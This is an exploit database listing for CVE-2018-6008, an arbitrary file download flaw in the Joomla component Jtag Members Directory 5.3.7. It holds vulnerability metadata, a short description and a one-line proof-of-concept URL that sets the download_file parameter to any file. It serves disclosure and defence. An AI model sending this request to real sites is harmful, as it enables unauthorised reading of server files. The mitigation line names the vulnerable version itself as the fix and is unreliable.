header-logo
Suggest Exploit
vendor:
Jtag Members Directory
by:
Ihsan Sencan
7.5
CVSS
HIGH
Arbitrary File Download
434
CWE
Product Name: Jtag Members Directory
Affected Version From: 5.3.7
Affected Version To: 5.3.7
Patch Exists: YES
Related CWE: CVE-2018-6008
CPE: a:joomlatag:jtag_members_directory:5.3.7
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: WiN7_x64/KaLiLinuX_x64
2018

Joomla! Component Jtag Members Directory 5.3.7 – Arbitrary File Download

The vulnerability allows an attacker download arbitrary file from the vulnerable Joomla! Component Jtag Members Directory 5.3.7. An attacker can send a specially crafted request to the vulnerable component in order to download arbitrary file.

Mitigation:

Update to the latest version of Joomla! Component Jtag Members Directory 5.3.7.
Source

Exploit-DB raw data:

# # # # #
# Exploit Title: Joomla! Component Jtag Members Directory 5.3.7 - Arbitrary File Download
# Dork: N/A
# Date: 27.01.2018
# Vendor Homepage: https://joomlatag.com/
# Software Link: https://extensions.joomla.org/extensions/extension/clients-a-communities/members-lists/jtag-members-directory/
# Version: 5.3.7
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-6008
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker download arbitrary file....
# 
# Proof of Concept: 
# 
# 1)
# http://localhost/[PATH]/index.php?option=com_jtagmembersdirectory&task=attachment&download_file=[FILE]
# 
# # # # #